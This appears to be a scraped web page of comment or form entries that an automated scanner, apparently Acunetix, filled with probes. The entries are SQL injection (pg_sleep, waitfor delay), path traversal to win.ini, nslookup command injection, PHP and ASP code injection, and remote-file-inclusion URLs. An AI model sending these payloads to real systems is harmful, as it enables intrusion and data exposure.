djbmixir Sunday, April 05, 2020 18:46
-1' OR 2+150-150-1=0+0+0+1 --
djbmixir
djbmixir Sunday, April 05, 2020 18:46
1
djbmixir
djbmixir Sunday, April 05, 2020 18:57
1
djbmixir
djbmixir Sunday, April 05, 2020 18:57
../../../../../../../../../../windows/win.ini
djbmixir
djbmixir Sunday, April 05, 2020 18:57
-1;select pg_sleep(18); --
djbmixir
djbmixir Sunday, April 05, 2020 18:57
wHpgl6nR')); waitfor delay '0:0:18' --
djbmixir
djbmixir Sunday, April 05, 2020 18:58
!(()&&!|*|*|
djbmixir
djbmixir Sunday, April 05, 2020 18:58
1
djbmixir
djbmixir Sunday, April 05, 2020 19:10
'+response.write(9845497*9759461)+'
djbmixir
djbmixir Sunday, April 05, 2020 19:10
1
djbmixir
djbmixir Sunday, April 05, 2020 19:10
QmKW4uiM'); waitfor delay '0:0:12' --
djbmixir
djbmixir Sunday, April 05, 2020 19:10
../../../../../../../../../../windows/win.ini%00.jpg
djbmixir
djbmixir Sunday, April 05, 2020 19:11
1
djbmixir
djbmixir Sunday, April 05, 2020 19:24
1
djbmixir
djbmixir Sunday, April 05, 2020 19:24
bVtxpuMH
djbmixir
djbmixir Sunday, April 05, 2020 19:24
yiSoq4QT'); waitfor delay '0:0:12' --
djbmixir
djbmixir Sunday, April 05, 2020 19:24
-1 OR 2+421-421-1=0+0+0+1
djbmixir
djbmixir Sunday, April 05, 2020 19:25
1
"+response.write(9942682*9852393)+" Sunday, April 05, 2020 19:36
1
djbmixir
djbmixir Sunday, April 05, 2020 19:36
$(nslookup LgAc7MND)
djbmixir
djbmixir Sunday, April 05, 2020 19:36
yu5ytIEe
djbmixir
djbmixir Sunday, April 05, 2020 19:36
-1' OR 2+540-540-1=0+0+0+1 or 'k2WPyWjl'='
djbmixir
djbmixir Sunday, April 05, 2020 19:36
�'�"
djbmixir
djbmixir Sunday, April 05, 2020 19:36
(select convert(int,CHAR(65)))
djbmixir
djbmixir Sunday, April 05, 2020 19:37
1_9392
djbmixir
djbmixir Sunday, April 05, 2020 19:37
1
ftlblymn
ftlblymn Sunday, April 05, 2020 20:41
1
ftlblymn
ftlblymn Sunday, April 05, 2020 20:41
i3iIhdNm';select pg_sleep(8); --
ftlblymn
ftlblymn Sunday, April 05, 2020 20:41
^(#$!@#$)(()))******
ftlblymn
ftlblymn Sunday, April 05, 2020 20:42
1
ftlblymn
ftlblymn Sunday, April 05, 2020 20:43
1
ftlblymn
ftlblymn Sunday, April 05, 2020 20:57
response.write(9945513*9084252)
ftlblymn
ftlblymn Sunday, April 05, 2020 20:57
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
ftlblymn
ftlblymn Sunday, April 05, 2020 20:58
1
ftlblymn
ftlblymn Sunday, April 05, 2020 20:59
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 21:05
1
djbmixir
djbmixir Sunday, April 05, 2020 21:11
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 21:16
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 21:22
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 21:24
1
djbmixir
djbmixir Sunday, April 05, 2020 22:09
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 22:12
1
djbmixir
djbmixir Sunday, April 05, 2020 22:19
1
djbmixir
djbmixir Sunday, April 05, 2020 22:19
-1);select pg_sleep(8); --
djbmixir
djbmixir Sunday, April 05, 2020 22:19
�'�"
wsekyogo
wsekyogo Sunday, April 05, 2020 22:31
1
djbmixir
djbmixir Sunday, April 05, 2020 22:31
${10000000+9999703}
djbmixir
djbmixir Sunday, April 05, 2020 22:31
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
djbmixir
djbmixir Sunday, April 05, 2020 22:31
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
djbmixir
djbmixir Sunday, April 05, 2020 22:31
-1));select pg_sleep(24); --
djbmixir
djbmixir Sunday, April 05, 2020 22:32
1
djbmixir
djbmixir Sunday, April 05, 2020 22:33
1
djbmixir
djbmixir Sunday, April 05, 2020 22:43
1
djbmixir
djbmixir Sunday, April 05, 2020 22:43
&nslookup pQKmIXlf&'\"`0&nslookup pQKmIXlf&`'
vsbarfdx
vsbarfdx Sunday, April 05, 2020 22:49
1
djbmixir
djbmixir Sunday, April 05, 2020 22:52
1
djbmixir
djbmixir Sunday, April 05, 2020 22:52
'"()
djbmixir
djbmixir Sunday, April 05, 2020 22:52
NFXL109c'; waitfor delay '0:0:9' --
djbmixir
djbmixir Sunday, April 05, 2020 22:52
-1;select pg_sleep(9); --
djbmixir
djbmixir Sunday, April 05, 2020 22:53
1
rudjqjsq
rudjqjsq Sunday, April 05, 2020 22:56
1
djbmixir
djbmixir Sunday, April 05, 2020 23:02
1
djbmixir
djbmixir Sunday, April 05, 2020 23:02
';print(md5(acunetix_wvs_security_test));$a='
djbmixir
djbmixir Sunday, April 05, 2020 23:03
1'"
djbmixir
djbmixir Sunday, April 05, 2020 23:04
1
djbmixir
djbmixir Sunday, April 05, 2020 23:26
1
djbmixir
djbmixir Sunday, April 05, 2020 23:36
1
djbmixir
djbmixir Sunday, April 05, 2020 23:36
JNZ0RIAh');select pg_sleep(9); --
djbmixir
djbmixir Sunday, April 05, 2020 23:46
1
djbmixir
djbmixir Sunday, April 05, 2020 23:46
Fc0y7FV5');select pg_sleep(6); --
djbmixir
djbmixir Sunday, April 05, 2020 23:46
${@print(md5(acunetix_wvs_security_test))}\
djbmixir
djbmixir Sunday, April 05, 2020 23:47
1
djbmixir
djbmixir Sunday, April 05, 2020 23:48
1
aeglhnho
aeglhnho Sunday, April 05, 2020 23:56
response.write(9834747*9091951)
aeglhnho
aeglhnho Sunday, April 05, 2020 23:56
1
aeglhnho
aeglhnho Sunday, April 05, 2020 23:56
)
aeglhnho
aeglhnho Sunday, April 05, 2020 23:57
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
aeglhnho
aeglhnho Sunday, April 05, 2020 23:57
1
aeglhnho
aeglhnho Sunday, April 05, 2020 23:57
Http://testasp.vulnweb.com/t/fit.txt
aeglhnho
aeglhnho Sunday, April 05, 2020 23:57
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
aeglhnho
aeglhnho Sunday, April 05, 2020 23:58
1
aeglhnho
aeglhnho Monday, April 06, 2020 00:00
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:07
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:08
^(#$!@#$)(()))******
ftlblymn
ftlblymn Monday, April 06, 2020 00:08
;print(md5(acunetix_wvs_security_test));
ftlblymn
ftlblymn Monday, April 06, 2020 00:08
&nslookup MXva30sl&'\"`0&nslookup MXva30sl&`'
ftlblymn
ftlblymn Monday, April 06, 2020 00:08
eZriS9fE'));select pg_sleep(21); --
ftlblymn
ftlblymn Monday, April 06, 2020 00:08
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:10
1
wsekyogo
wsekyogo Monday, April 06, 2020 00:15
)
'+response.write(9294056*9733459)+'
'+response.write(9294056*9733459)+' Monday, April 06, 2020 00:17
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:17
12345'"\'\");|[*%00{%0d%0a<%00>%bf%27'💩]
ftlblymn
ftlblymn Monday, April 06, 2020 00:17
1some_inexistent_file_with_long_name%00.jpg
ftlblymn
ftlblymn Monday, April 06, 2020 00:18
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:26
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:27
................windowswin.ini
ftlblymn
ftlblymn Monday, April 06, 2020 00:28
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:43
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:51
1
ftlblymn
ftlblymn Monday, April 06, 2020 00:51
1some_inexistent_file_with_long_name%00.jpg
ftlblymn
ftlblymn Monday, April 06, 2020 00:52
�''�""
ftlblymn
ftlblymn Monday, April 06, 2020 00:52
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:01
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:01
../../../../../../../../../../windows/win.ini
ftlblymn
ftlblymn Monday, April 06, 2020 01:02
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:11
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:12
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:19
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:20
-1;select pg_sleep(5); --
ftlblymn
ftlblymn Monday, April 06, 2020 01:20
WEB-INF\web.xml
ftlblymn
ftlblymn Monday, April 06, 2020 01:20
)
ftlblymn
ftlblymn Monday, April 06, 2020 01:20
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:29
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:29
";print(md5(acunetix_wvs_security_test));$a="
ftlblymn
ftlblymn Monday, April 06, 2020 01:29
http://testasp.vulnweb.com/t/xss.html?%00.jpg
ftlblymn
ftlblymn Monday, April 06, 2020 01:30
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:38
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:39
WEB-INF\web.xml
ftlblymn
ftlblymn Monday, April 06, 2020 01:39
�'�"
ftlblymn
ftlblymn Monday, April 06, 2020 01:39
1
\
\ Monday, April 06, 2020 01:43
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:47
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:47
k65Mk3pb';select pg_sleep(15); --
ftlblymn
ftlblymn Monday, April 06, 2020 01:47
${@print(md5(acunetix_wvs_security_test))}\
ftlblymn
ftlblymn Monday, April 06, 2020 01:48
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:57
1
ftlblymn
ftlblymn Monday, April 06, 2020 01:57
Http://testasp.vulnweb.com/t/fit.txt
ftlblymn
ftlblymn Monday, April 06, 2020 01:57
1'"()&%
'+response.write(9371259*9446438)+'
'+response.write(9371259*9446438)+' Monday, April 06, 2020 02:06
1
djbmixir
djbmixir Monday, April 06, 2020 02:27
1
djbmixir
djbmixir Monday, April 06, 2020 02:48
1
�'�
�'�" Monday, April 06, 2020 02:49
1
djbmixir
djbmixir Monday, April 06, 2020 03:10
1
djbmixir
djbmixir Monday, April 06, 2020 03:10
-1 OR 2+878-878-1=0+0+0+1
djbmixir
djbmixir Monday, April 06, 2020 03:13
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
vsbarfdx
vsbarfdx Monday, April 06, 2020 03:16
1
djbmixir
djbmixir Monday, April 06, 2020 03:18
1
djbmixir
djbmixir Monday, April 06, 2020 03:18
1some_inexistent_file_with_long_name%00.jpg
djbmixir
djbmixir Monday, April 06, 2020 03:19
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:40
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:48
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:48
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:48
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:48
@@2QO2x
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:48
$(nslookup 2FymHJfK)
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:57
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:57
set|set&set
tjyobjbk
tjyobjbk Monday, April 06, 2020 03:58
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:05
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:06
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:07
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:13
6frnxpuX
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:13
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:13
JyI=
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:13
'"
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:21
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:21
response.write(9401345*9965247)
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:21
'"()&%
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:28
1
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:28
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
tjyobjbk
tjyobjbk Monday, April 06, 2020 04:51
1
djbmixir
djbmixir Monday, April 06, 2020 05:00
1
djbmixir
djbmixir Monday, April 06, 2020 05:07
1
djbmixir
djbmixir Monday, April 06, 2020 05:08
12345'"\'\");|[*%00{%0d%0a<%00>%bf%27'💩]
djbmixir
djbmixir Monday, April 06, 2020 05:08
${@print(md5(acunetix_wvs_security_test))}
djbmixir
djbmixir Monday, April 06, 2020 05:09
1
djbmixir
djbmixir Monday, April 06, 2020 05:16
1
djbmixir
djbmixir Monday, April 06, 2020 05:17
1
djbmixir
djbmixir Monday, April 06, 2020 05:20
1
aeglhnho
aeglhnho Monday, April 06, 2020 05:35
1
aeglhnho
aeglhnho Monday, April 06, 2020 05:36
Http://testasp.vulnweb.com/t/fit.txt
aeglhnho
aeglhnho Monday, April 06, 2020 05:36
'"()
aeglhnho
aeglhnho Monday, April 06, 2020 05:37
1
ftlblymn
ftlblymn Monday, April 06, 2020 05:43
1
ftlblymn
ftlblymn Monday, April 06, 2020 05:43
-1' OR 2+291-291-1=0+0+0+1 or '4Th3d3PL'='
ftlblymn
ftlblymn Monday, April 06, 2020 05:50
1
ftlblymn
ftlblymn Monday, April 06, 2020 05:50
Http://testasp.vulnweb.com/t/fit.txt
ftlblymn
